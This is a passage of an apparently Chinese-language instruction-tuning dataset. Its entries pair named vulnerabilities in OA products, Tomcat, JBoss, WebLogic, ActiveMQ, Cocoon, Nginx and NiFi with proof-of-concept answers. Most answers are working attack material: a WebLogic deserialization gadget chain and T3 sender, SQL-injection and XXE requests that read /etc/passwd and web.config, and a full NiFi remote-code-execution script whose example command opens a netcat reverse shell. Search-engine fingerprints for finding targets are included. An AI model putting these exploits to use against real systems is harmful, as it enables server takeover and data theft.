2):\n        url = sys.argv[1]\n        GetShell(url)\n    else:\n        print(\"python3 poc.py http://xx.xx.xx.xx\")\n\nif __name__ == '__main__':\n    main()\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/泛微OA weaver.common.Ctrl 任意文件上传漏洞.md"}
    1003. 

  1003. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:金和OA C6 download.jsp 任意文件读取漏洞\n漏洞描述:金和OA C6 download.jsp文件存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器中的敏感信息\n影响版本:``` 金和OA ```\n网络测绘:``` app=\"Jinher-OA\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. app=\"Jinher-OA\"\n2. <%       \n\tResponse.Buffer     =     true       \n\tResponse.Clear       \n\t      \n\tdim     url       \n\tDim     fso,fl,flsize       \n\tdim     Dname       \n\tDim     objStream,ContentType,flName,isre,url1       \n\t'*********************************************调用时传入的下载文件名       \n\tDname=trim(request(\"filename\"))       \n\t'******************************************************************       \n\tIf     Dname<>\"\"     Then       \n\t'******************************下载文件存放的服务端目录       \n\t\t\t\t\t\t\turl=server.MapPath(Dname)       \n\t\t\t\t\t\t\t'url=server.MapPath(\"./\")&\"\\Jhsoft.Web.module\\testbill\\dj\"&Dname     '这边做了一下改动By   Fanshui   \n\t'***************************************************       \n\tEnd     If       \n\t'Response.write   url   \n\t'response.end   \n\n\tSet     fso=Server.CreateObject(\"Scripting.FileSystemObject\")       \n\tSet     fl=fso.getfile(url)       \n\tflsize=fl.size       \n\tflName=fl.name       \n\tSet     fl=Nothing       \n\tSet     fso=Nothing     \n\t'Response.write flName\n\t'Response.write flsize\n%>    \n\n\n<%       \n    Set\t\tobjStream     =     Server.CreateObject(\"ADODB.Stream\")\n\t'objStream.Mode    =    3  \n\tobjStream.Type     =     1\n    objStream.Open        \n    objStream.LoadFromFile     url       \n\n\n    Select     Case     lcase(Right(flName,     4))       \n        Case     \".asf\"       \n                                ContentType     =     \"video/x-ms-asf\"       \n        Case     \".avi\"       \n                                ContentType     =     \"video/avi\"       \n        Case     \".doc\"       \n                                ContentType     =     \"application/msword\"       \n        Case     \".zip\"       \n                                ContentType     =     \"application/zip\"       \n        Case     \".xls\"       \n                                ContentType     =     \"application/vnd.ms-excel\"       \n        Case     \".gif\"       \n                                ContentType     =     \"image/gif\"       \n        Case     \".jpg\",     \"jpeg\"       \n                                ContentType     =     \"image/jpeg\"       \n        Case     \".wav\"       \n                                ContentType     =     \"audio/wav\"       \n        Case     \".mp3\"       \n                                ContentType     =     \"audio/mpeg3\"       \n        Case     \".mpg\",     \"mpeg\"       \n                                ContentType     =     \"video/mpeg\"       \n        Case     \".rtf\"       \n                                ContentType     =     \"application/rtf\"       \n        Case     \".htm\",     \"html\"       \n                                ContentType     =     \"text/html\"       \n        Case     \".txt\"       \n                                ContentType     =     \"text/plain\"       \n        Case     Else       \n                                ContentType     =     \"application/octet-stream\"       \n    End     Select       \n\n\n\n\tResponse.AddHeader     \"Content-Disposition\",     \"attachment;     filename=\"     &     flName       \n    Response.AddHeader     \"Content-Length\",     flsize       \n\n    Response.Charset     =     \"UTF-8\"       \n    Response.ContentType     =     ContentType   \n\n\tResponse.BinaryWrite     objStream.Read       \n    Response.Flush       \n    response.Clear()       \n    objStream.Close       \n    Set     objStream     =     Nothing       \n\n%>\n3. /C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=/c6/web.config\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/金和OA C6 download.jsp 任意文件读取漏洞.md"}
    1004. 

  1004. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:用友 GRP-U8 Proxy SQL注入 CNNVD-201610-923\n漏洞描述:用友GRP-u8存在XXE漏洞,该漏洞源于应用程序解析XML输入时没有进制外部实体的加载,导致可加载外部SQL语句,以及命令执行\n影响版本:``` 用友GRP-U8行政事业内控管理软件(新政府会计制度专版) ```\n网络测绘:``` title=\"用友GRP-U8行政事业内控管理软件\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. 用友GRP-U8行政事业内控管理软件(新政府会计制度专版)\n2. title=\"用友GRP-U8行政事业内控管理软件\"\n3. POST /Proxy HTTP/1.1\nAccept: Accept: */*\nContent-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;) Host: host\nContent-Length: 357\nConnection: Keep-Alive\nCache-Control: no-cache\n\n\ncVer=9.8.0&dp=<?xml version=\"1.0\" encoding=\"GB2312\"?><R9PACKET version=\"1\"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION> <NAME>AS_DataRequest</NAME><PARAMS><PARAM> <NAME>ProviderName</NAME><DATA format=\"text\">DataSetProviderData</DATA></PARAM><PARAM> <NAME>Data</NAME><DATA format=\"text\">select @@version</DATA></PARAM></PARAMS> </R9FUNCTION></R9PACKET>\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/用友 GRP-U8 Proxy SQL注入 CNNVD-201610-923.md"}
    1005. 

  1005. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Tomcat 信息泄露漏洞 CVE-2021-24122\n漏洞描述:使用NTFS文件系统从网络位置提供资源时,Apache Tomcat版本10.0.0-M1至10.0.0-M9、9.0.0.0.M1至9.0.39、8.5.0至8.5.59和7.0.0至7.0.106在某些配置中容易受到JSP源代码公开的影响。根本原因是JRE API File.getCanonicalPath()的意外行为,这又是由Windows API(FindFirstFileW)在某些情况下的不一致行为引起的。\n影响版本:``` Apache Tomcat 10.0.0-M1-10.0.0-M9 Apache Tomcat 9.0.0.M1-9.0.39 Apache Tomcat 8.5.0-8.5.59 Apache Tomcat 7.0.0-7.0.106 ```\n", "input": "", "output": "【漏洞类型】web_server_vulnerability\n【CVE编号】CVE-2021-24122\n【POC利用方法】\n1. Apache Tomcat 10.0.0-M1-10.0.0-M9\nApache Tomcat 9.0.0.M1-9.0.39\nApache Tomcat 8.5.0-8.5.59\nApache Tomcat 7.0.0-7.0.106\n2. getCanonicalPath()\n\n此路径方法返回绝对唯一的标准规范路径名。此方法首先将此路径名转换为绝对形式,就像调用getAbsolutePath方法一样,然后以系统相关的方式将其映射到其唯一路径上。\n也就是说如果路径中包含“.”或“..”等当前路径及上层路径表示法,则会从路径名中删除“.”和“..”使用真实路径代替。另外比较重点的是 它还会解析软链接(在UNIX平台上)以及将驱动器号(在Microsoft Windows平台上),将它们转换为标准实际路径。\n3. 使用NTFS文件系统从网络位置提供资源时,Apache Tomcat版本10.0.0-M1至10.0.0-M9、9.0.0.0.M1至9.0.39、8.5.0至8.5.59和7.0.0至7.0.106在某些配置中容易受到JSP源代码公开的影响。根本原因是JRE API File.getCanonicalPath()的意外行为,这又是由Windows API(FindFirstFileW)在某些情况下的不一致行为引起的。\n", "category": "poc_web_server_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web服务器漏洞/Apache Tomcat 信息泄露漏洞 CVE-2021-24122.md"}
    1006. 

  1006. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:JBoss 4.x JBossMQ JMS 反序列化漏洞 CVE-2017-7504\n漏洞描述:Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。\n影响版本:``` JBoss AS 4.x及之前版本 ```\n", "input": "", "output": "【漏洞类型】web_server_vulnerability\n【CVE编号】CVE-2017-7504\n【POC利用方法】\n1. JBoss AS 4.x及之前版本\n2. https://github.com/vulhub/vulhub.git\ncd vulhub/jboss/CVE-2017-7504\ndocker-compose build\ndocker-compose up -d\n3. python3 jexboss.py -host http://192.168.51.133:8080\n", "category": "poc_web_server_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web服务器漏洞/JBoss 4.x JBossMQ JMS 反序列化漏洞 CVE-2017-7504.md"}
    1007. 

  1007. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Weblogic Server 远程代码执行漏洞 CVE-2020-14756\n漏洞描述:weblogic的T3协议反序列化漏洞一直是一个比较热门也比较好用的漏洞,weblogic针对该漏洞的解决方案就是不断填充黑名单,在高版本jdk下配合jep290机制实现黑名单,在低版本下配合resolveClass进行防御,所以安全人员对于T3反序列化的利用也是一直在寻找黑名单之外的利用链。 CVE-2020-14756 这个漏洞的利用比较巧妙,通过利用weblogic coherence组件中的类,绕过了黑名单机制的检测,重新能够利用黑名单中的类,造成代码执行。 参考链接: - https://www.oracle.com/security-alerts/cpujan2021.html#AppendixFMW - https://github.com/Y4er/CVE-2020-14756\n影响版本:``` Oracle Weblogic Server 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0 ```\n", "input": "", "output": "【漏洞类型】web_server_vulnerability\n【CVE编号】CVE-2020-14756\n【POC利用方法】\n1. Oracle Weblogic Server 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0\n2. package com.supeream;\n\nimport com.supeream.serial.Serializables;\nimport com.supeream.weblogic.T3ProtocolOperation;\n// coherence-rest.jar\nimport com.tangosol.coherence.rest.util.extractor.MvelExtractor;\n// coherence-web.jar\nimport com.tangosol.coherence.servlet.AttributeHolder;\n// coherence.jar\nimport com.tangosol.util.SortedBag;\nimport com.tangosol.util.aggregator.TopNAggregator;\n\nimport java.io.File;\nimport java.io.FileOutputStream;\nimport java.io.ObjectOutputStream;\nimport java.lang.reflect.Field;\nimport java.lang.reflect.Method;\n\npublic class CVE_2020_14756 {\n    public static void main(String[] args) {\n        MvelExtractor extractor = new MvelExtractor(\"java.lang.Runtime.getRuntime().exec(\\\"calc\\\");\");\n        MvelExtractor extractor2 = new MvelExtractor(\"\");\n\n        try {\n            SortedBag sortedBag = new TopNAggregator.PartialResult(extractor2, 2);\n            AttributeHolder attributeHolder = new AttributeHolder();\n            sortedBag.add(1);\n\n            Field m_comparator = sortedBag.getClass().getSuperclass().getDeclaredField(\"m_comparator\");\n            m_comparator.setAccessible(true);\n            m_comparator.set(sortedBag, extractor);\n\n            Method setInternalValue = attributeHolder.getClass().getDeclaredMethod(\"setInternalValue\", Object.class);\n            setInternalValue.setAccessible(true);\n            setInternalValue.invoke(attributeHolder, sortedBag);\n            /*\n            FileOutputStream fileOutputStream = new FileOutputStream(new File(\"test.ser\"));\n            ObjectOutputStream objectOutputStream = new ObjectOutputStream(fileOutputStream);\n            objectOutputStream.writeObject(attributeHolder);\n            */\n            T3ProtocolOperation.send(\"192.168.65.128\", \"7001\", Serializables.serialize(attributeHolder));\n\n        } catch (Exception e) {\n            e.printStackTrace();\n        }\n    }\n}\n3. #!/usr/bin/python\nimport socket\nimport os\nimport sys\nimport struct\n\nif len(sys.argv) < 3:\n    print 'Usage: python %s <host> <port> </path/to/payload>' % os.path.basename(sys.argv[0])\n    sys.exit()\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nsock.settimeout(5)\n\nserver_address = (sys.argv[1], int(sys.argv[2]))\nprint '[+] Connecting to %s port %s' % server_address\nsock.connect(server_address)\n\n# Send headers\nheaders='t3 12.2.1\\nAS:255\\nHL:19\\nMS:10000000\\nPU:t3://us-l-breens:7001\\n\\n'\nprint 'sending \"%s\"' % headers\nsock.sendall(headers)\n\ndata = sock.recv(1024)\nprint >>sys.stderr, 'received \"%s\"' % data\n\npayloadObj = open(sys.argv[3],'rb').read()\n\npayload='\\x00\\x00\\x09\\xf3\\x01\\x65\\x01\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x00\\x00\\x00\\x71\\x00\\x00\\xea\\x60\\x00\\x00\\x00\\x18\\x43\\x2e\\xc6\\xa2\\xa6\\x39\\x85\\xb5\\xaf\\x7d\\x63\\xe6\\x43\\x83\\xf4\\x2a\\x6d\\x92\\xc9\\xe9\\xaf\\x0f\\x94\\x72\\x02\\x79\\x73\\x72\\x00\\x78\\x72\\x01\\x78\\x72\\x02\\x78\\x70\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x70\\x70\\x70\\x70\\x70\\x70\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x70\\x06\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x1d\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x43\\x6c\\x61\\x73\\x73\\x54\\x61\\x62\\x6c\\x65\\x45\\x6e\\x74\\x72\\x79\\x2f\\x52\\x65\\x81\\x57\\xf4\\xf9\\xed\\x0c\\x00\\x00\\x78\\x70\\x72\\x00\\x24\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2e\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2e\\x50\\x61\\x63\\x6b\\x61\\x67\\x65\\x49\\x6e\\x66\\x6f\\xe6\\xf7\\x23\\xe7\\xb8\\xae\\x1e\\xc9\\x02\\x00\\x09\\x49\\x00\\x05\\x6d\\x61\\x6a\\x6f\\x72\\x49\\x00\\x05\\x6d\\x69\\x6e\\x6f\\x72\\x49\\x00\\x0b\\x70\\x61\\x74\\x63\\x68\\x55\\x70\\x64\\x61\\x74\\x65\\x49\\x00\\x0c\\x72\\x6f\\x6c\\x6c\\x69\\x6e\\x67\\x50\\x61\\x74\\x63\\x68\\x49\\x00\\x0b\\x73\\x65\\x72\\x76\\x69\\x63\\x65\\x50\\x61\\x63\\x6b\\x5a\\x00\\x0e\\x74\\x65\\x6d\\x70\\x6f\\x72\\x61\\x72\\x79\\x50\\x61\\x74\\x63\\x68\\x4c\\x00\\x09\\x69\\x6d\\x70\\x6c\\x54\\x69\\x74\\x6c\\x65\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x4c\\x00\\x0a\\x69\\x6d\\x70\\x6c\\x56\\x65\\x6e\\x64\\x6f\\x72\\x71\\x00\\x7e\\x00\\x03\\x4c\\x00\\x0b\\x69\\x6d\\x70\\x6c\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x71\\x00\\x7e\\x00\\x03\\x78\\x70\\x77\\x02\\x00\\x00\\x78\\xfe\\x01\\x00\\x00'\npayload=payload+payloadObj\npayload=payload+'\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x1d\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x43\\x6c\\x61\\x73\\x73\\x54\\x61\\x62\\x6c\\x65\\x45\\x6e\\x74\\x72\\x79\\x2f\\x52\\x65\\x81\\x57\\xf4\\xf9\\xed\\x0c\\x00\\x00\\x78\\x70\\x72\\x00\\x21\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2e\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2e\\x50\\x65\\x65\\x72\\x49\\x6e\\x66\\x6f\\x58\\x54\\x74\\xf3\\x9b\\xc9\\x08\\xf1\\x02\\x00\\x07\\x49\\x00\\x05\\x6d\\x61\\x6a\\x6f\\x72\\x49\\x00\\x05\\x6d\\x69\\x6e\\x6f\\x72\\x49\\x00\\x0b\\x70\\x61\\x74\\x63\\x68\\x55\\x70\\x64\\x61\\x74\\x65\\x49\\x00\\x0c\\x72\\x6f\\x6c\\x6c\\x69\\x6e\\x67\\x50\\x61\\x74\\x63\\x68\\x49\\x00\\x0b\\x73\\x65\\x72\\x76\\x69\\x63\\x65\\x50\\x61\\x63\\x6b\\x5a\\x00\\x0e\\x74\\x65\\x6d\\x70\\x6f\\x72\\x61\\x72\\x79\\x50\\x61\\x74\\x63\\x68\\x5b\\x00\\x08\\x70\\x61\\x63\\x6b\\x61\\x67\\x65\\x73\\x74\\x00\\x27\\x5b\\x4c\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2f\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2f\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2f\\x50\\x61\\x63\\x6b\\x61\\x67\\x65\\x49\\x6e\\x66\\x6f\\x3b\\x78\\x72\\x00\\x24\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2e\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2e\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x49\\x6e\\x66\\x6f\\x97\\x22\\x45\\x51\\x64\\x52\\x46\\x3e\\x02\\x00\\x03\\x5b\\x00\\x08\\x70\\x61\\x63\\x6b\\x61\\x67\\x65\\x73\\x71\\x00\\x7e\\x00\\x03\\x4c\\x00\\x0e\\x72\\x65\\x6c\\x65\\x61\\x73\\x65\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x5b\\x00\\x12\\x76\\x65\\x72\\x73\\x69\\x6f\\x6e\\x49\\x6e\\x66\\x6f\\x41\\x73\\x42\\x79\\x74\\x65\\x73\\x74\\x00\\x02\\x5b\\x42\\x78\\x72\\x00\\x24\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2e\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2e\\x50\\x61\\x63\\x6b\\x61\\x67\\x65\\x49\\x6e\\x66\\x6f\\xe6\\xf7\\x23\\xe7\\xb8\\xae\\x1e\\xc9\\x02\\x00\\x09\\x49\\x00\\x05\\x6d\\x61\\x6a\\x6f\\x72\\x49\\x00\\x05\\x6d\\x69\\x6e\\x6f\\x72\\x49\\x00\\x0b\\x70\\x61\\x74\\x63\\x68\\x55\\x70\\x64\\x61\\x74\\x65\\x49\\x00\\x0c\\x72\\x6f\\x6c\\x6c\\x69\\x6e\\x67\\x50\\x61\\x74\\x63\\x68\\x49\\x00\\x0b\\x73\\x65\\x72\\x76\\x69\\x63\\x65\\x50\\x61\\x63\\x6b\\x5a\\x00\\x0e\\x74\\x65\\x6d\\x70\\x6f\\x72\\x61\\x72\\x79\\x50\\x61\\x74\\x63\\x68\\x4c\\x00\\x09\\x69\\x6d\\x70\\x6c\\x54\\x69\\x74\\x6c\\x65\\x71\\x00\\x7e\\x00\\x05\\x4c\\x00\\x0a\\x69\\x6d\\x70\\x6c\\x56\\x65\\x6e\\x64\\x6f\\x72\\x71\\x00\\x7e\\x00\\x05\\x4c\\x00\\x0b\\x69\\x6d\\x70\\x6c\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x71\\x00\\x7e\\x00\\x05\\x78\\x70\\x77\\x02\\x00\\x00\\x78\\xfe\\x00\\xff\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x13\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x4a\\x56\\x4d\\x49\\x44\\xdc\\x49\\xc2\\x3e\\xde\\x12\\x1e\\x2a\\x0c\\x00\\x00\\x78\\x70\\x77\\x46\\x21\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x09\\x31\\x32\\x37\\x2e\\x30\\x2e\\x31\\x2e\\x31\\x00\\x0b\\x75\\x73\\x2d\\x6c\\x2d\\x62\\x72\\x65\\x65\\x6e\\x73\\xa5\\x3c\\xaf\\xf1\\x00\\x00\\x00\\x07\\x00\\x00\\x1b\\x59\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x00\\x78\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x13\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x4a\\x56\\x4d\\x49\\x44\\xdc\\x49\\xc2\\x3e\\xde\\x12\\x1e\\x2a\\x0c\\x00\\x00\\x78\\x70\\x77\\x1d\\x01\\x81\\x40\\x12\\x81\\x34\\xbf\\x42\\x76\\x00\\x09\\x31\\x32\\x37\\x2e\\x30\\x2e\\x31\\x2e\\x31\\xa5\\x3c\\xaf\\xf1\\x00\\x00\\x00\\x00\\x00\\x78'\n\n# adjust header for appropriate message length\npayload=struct.pack('>I',len(payload)) + payload[4:]\n\nprint '[+] Sending payload...'\nsock.send(payload)\ndata = sock.recv(1024)\nprint >>sys.stderr, 'received \"%s\"' % data\n", "category": "poc_web_server_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web服务器漏洞/Weblogic Server远程代码执行漏洞 CVE-2020-14756.md"}
    1008. 

  1008. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache ActiveMQ远程代码执行\n漏洞描述:Apache ActiveMQ 是 Apache 软件基金会研发的一个开源消息中间件,为应用程序提供高效的、可扩展的、稳定的和安全的企业级消息通信。 当未经身份认证的攻击者访问 Apache ActiveMQ 的 61616 端口时,可通过发送恶意数据在远程服务器上执行代码,进而控制 Apache ActiveMQ 服务器。 更新日期:2023-10-25 参考链接: - https://activemq.apache.org/activemq-5016006-release - https://github.com/Fw-fW-fw/activemq_Throwable\n影响版本:``` Apache ActiveMQ  < 5.18.3 ```\n", "input": "", "output": "【漏洞类型】web_server_vulnerability\n【POC利用方法】\n1. Apache ActiveMQ  < 5.18.3\n2. ./activemq console\n3. python3 -m http.server 8080\n", "category": "poc_web_server_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web服务器漏洞/Apache ActiveMQ远程代码执行.md"}
    1009. 

  1009. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Cocoon XML注入 CVE-2020-11991\n漏洞描述:9月11日 Apache 软件基金会发布安全公告,修复了 Apache Cocoon xml外部实体注入漏洞(CVE-2020-11991)。 Apache Cocoon 是一个基于 Spring 框架的围绕分离理念建立的构架,在这种框架下的所有处理都被预先定义好的处理组件线性连接起来,能够将输入和产生的输出按照流水线顺序处理。用户群:Apache Lenya、Daisy CMS、Hippo CMS、Mindquarry等等,Apache Cocoon 通常被作为一个数据抽取、转换、加载工具或者是系统之间传输数据的中转站。CVE-2020-11991 与 StreamGenerator 有关,在使用 StreamGenerator 时,代码将解析用户提供的 xml。攻击者可以使用包括外部系统实体在内的特制 xml 来访问服务器系统上的任何文件。\n影响版本:``` Apache Cocoon <= 2.1.12 ```\n网络测绘:``` app=\"Apache-Cocoon\" ```\n", "input": "", "output": "【漏洞类型】web_server_vulnerability\n【CVE编号】CVE-2020-11991\n【POC利用方法】\n1. Apache Cocoon <= 2.1.12\n2. app=\"Apache-Cocoon\"\n3. <!--?xml version=\"1.0\" ?-->\n<!DOCTYPE replace [<!ENTITY ent SYSTEM \"file:///etc/passwd\"> ]>\n<userInfo>\n<firstName>John</firstName> \n<lastName>&ent;</lastName>\n</userInfo>\n", "category": "poc_web_server_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web服务器漏洞/Apache Cocoon XML注入 CVE-2020-11991.md"}
    1010. 

  1010. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Nginx越界读取缓存漏洞 CVE-2017-7529\n漏洞描述:Nginx在反向代理站点的时候,通常会将一些文件进行缓存,特别是静态文件。缓存的部分存储在文件中,每个缓存文件包括“文件头”+“HTTP返回包头”+“HTTP返回包体”。如果二次请求命中了该缓存文件,则Nginx会直接将该文件中的“HTTP返回包体”返回给用户。 如果我的请求中包含Range头,Nginx将会根据我指定的start和end位置,返回指定长度的内容。而如果我构造了两个负的位置,如(-600, -9223372036854774591),将可能读取到负位置的数据。如果这次请求又命中了缓存文件,则可能就可以读取到缓存文件中位于“HTTP返回包体”前的“文件头”、“HTTP返回包头”等内容。\n影响版本:``` Nginx version 0.5.6 - 1.13.2 ```\n", "input": "", "output": "【漏洞类型】web_server_vulnerability\n【CVE编号】CVE-2017-7529\n【POC利用方法】\n1. Nginx version 0.5.6 - 1.13.2\n2. git clone https://github.com/vulhub/vulhub.git\ncd vulhub/nginx/CVE-2017-7529\ndocker-compose up -d\n3. python poc.py http://xxx.xxx.xxx.xxx:8080/\n", "category": "poc_web_server_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web服务器漏洞/Nginx越界读取缓存漏洞 CVE-2017-7529.md"}
    1011. 

  1011. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache NiFi Api 远程代码执行 RCE\n漏洞描述:Apache NiFi是Apache Software Foundation的一个软件项目,旨在使软件系统之间的数据流自动化。 参考链接: - https://twitter.com/chybeta/status/1333341820596568065 - https://github.com/imjdl/Apache-NiFi-Api-RCE - https://forum.ywhack.com/thread-114763-1-3.html\n网络测绘:``` \"nifi\" && title==\"NiFi\" ```\n", "input": "", "output": "【漏洞类型】web_server_vulnerability\n【POC利用方法】\n1. \"nifi\" && title==\"NiFi\"\n2. import sys\nimport json\nimport requests as req\n\n\nclass Exp:\n    def __init__(self, url):\n        self.url = url\n\n    def check_is_vul(self):\n        url = self.url + \"/nifi-api/access/config\"\n        try:\n            res = req.get(url=url, verify=False)\n            data = res.json()\n            return not data[\"config\"][\"supportsLogin\"]\n        except Exception as e:\n            pass\n        return False\n\n    def clean_up(self, p_id):\n        url = self.url + \"/nifi-api/processors/\" + p_id + \"/run-status\"\n        data = {'revision': {'clientId': 'x', 'version': 1}, 'state': 'STOPPED'}\n        req.put(url=url, data=json.dumps(data), verify=False)\n        req.delete(url + \"/threads\", verify=False)\n\n    def exploit(self, cmd):\n        g_id = self.fetch_process_group()\n        if g_id:\n            p_id = self.create_process(g_id)\n            if p_id:\n                self.run_cmd(p_id=p_id, cmd=cmd)\n                self.clean_up(p_id=p_id)\n\n    def run_cmd(self, p_id, cmd):\n        url = self.url + \"/nifi-api/processors/\" + p_id\n        cmd = cmd.split(\" \")\n        data = {\n            'component': {\n                'config': {\n                    'autoTerminatedRelationships': ['success'],\n                    'properties': {\n                        'Command': cmd[0],\n                        'Command Arguments': \" \".join(cmd[1:]),\n                    },\n                    'schedulingPeriod': '3600 sec'\n                },\n                'id': p_id,\n                'state': 'RUNNING'\n            },\n            'revision': {'clientId': 'x', 'version': 1}\n        }\n        print(data)\n        headers = {\n            \"Content-Type\": \"application/json\",\n        }\n        res = req.put(url=url, data=json.dumps(data), headers=headers, verify=False)\n        return res.json()\n\n    def fetch_process_group(self):\n        url = self.url + \"/nifi-api/process-groups/root\"\n        try:\n            res = req.get(url=url, verify=False)\n            data = res.json()[\"id\"]\n            return data\n        except Exception as e:\n            pass\n        return 0\n\n    def create_process(self, process_group_id):\n        url = self.url + \"/nifi-api/process-groups/\" + process_group_id + \"/processors\"\n        data = {\n            'component': {\n                'type': 'org.apache.nifi.processors.standard.ExecuteProcess'\n            },\n            'revision': {\n                'version': 0\n            }\n        }\n        headers = {\n            \"Content-Type\": \"application/json\",\n        }\n        try:\n            res = req.post(url=url, data=json.dumps(data), headers=headers, verify=False)\n            return res.json()[\"id\"]\n        except Exception as e:\n            pass\n        return 0\n\n\nif __name__ == '__main__':\n    if len(sys.argv) != 3:\n        print(\"rce.py url cmd\")\n    else:\n        url = sys.argv[1]  # http://192.168.1.1:8080\n        cmd = sys.argv[2]  # nc -e /bin/bash 192.168.1.129 1234\n        e = Exp(url)\n        e.exploit(cmd)\n3. https://packetstormsecurity.com/files/160260/apache_nifi_processor_rce.rb.txt\n", "category": "poc_web_server_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web服务器漏洞/Apache NiFi Api 远程代码执行 RCE.md"}
    1012. 

